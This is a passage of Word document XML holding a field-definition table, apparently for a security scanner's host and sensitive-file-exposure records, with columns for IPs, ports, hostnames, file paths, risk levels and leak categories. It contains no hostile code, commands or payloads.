            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>externalIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="69625388" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C2B6FA7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="29676569" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>外网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="67ACD9B7" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="641352FF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>internalIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5463DE12" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="164B45CA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60C1036A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>内网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6990053A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D292402" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>bizGroupId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E575B75" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="585C85B9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>bigint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7082EB76" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2BC83414" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5525698C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>bizGroup</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="174EF3C8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4AEB03EA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3502140E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="30F4EBF9" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A82B8AF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>remark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="43F3EE1C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00028E87" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D228929" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="64DA0D71" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F0D7D75" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>hostTagList</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0392CEB8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32111AD2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="553ECA0C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>标签</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2ADB4BAC" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C429526" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="41609843" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31BE2ACB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="677C692A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3B2B6730" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="39F2D00A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3323DF35" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0236CA5A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0AFD86DC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4DCA4481" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B226EED" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="43064420" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62706B25" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0DCB5D63" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>端口</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="15B6A706" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="63B2E2C6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>portStatus</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60B2C4EE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4539DA18" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="57709951" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>端口访问性：-1-未知；0-对内；1-对外</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0FAC92EA" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B32488E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>translate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73162BFA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34A1FF18" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="45C41D80" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>解析方式：0-host解析；1-dns解析</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6B5FE395" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A8CE58F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>serverName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A4F94E3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A0F9E8F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6442A279" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>域名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="52D76A21" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="58AAACFC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>filePath</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="26BB2214" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="74172DA2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="383E8DEC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>文件路径</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4A0AA724" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D0F5433" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>regexLevel</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="401DE4B2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55DB5508" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>6)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A5A01FA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>危险等级：1-低危；2-中危；3-高危</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="17E4199B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="15BAE952" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>regexType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E95AF14" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F6A6643" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>6)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7FE1E390" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>类型：'1'-'临时文件'; '2'-'压缩文件';'3'-'备份文件泄露';'4'-'数据文件泄露'；'5'-'配置文件泄露';'6'-'日志泄露';'7'-'脚本泄露';'8'-'Office文档';'9'-'源代码泄露';'10'-'系统文件';'11'-'phpinfo文件'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7D6187FC" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24B70063" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>regexTypeDesc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B96AED5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7EBDE52F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="560E4B09" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>类型描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="46A41A03" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="21AAC815" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>checkUrl</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2FCA9915" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A5F911A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F4E3717" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>验证路径</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="74D9DD94" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2086C8D2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>modifyTime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6DD2F10F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5076C54F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
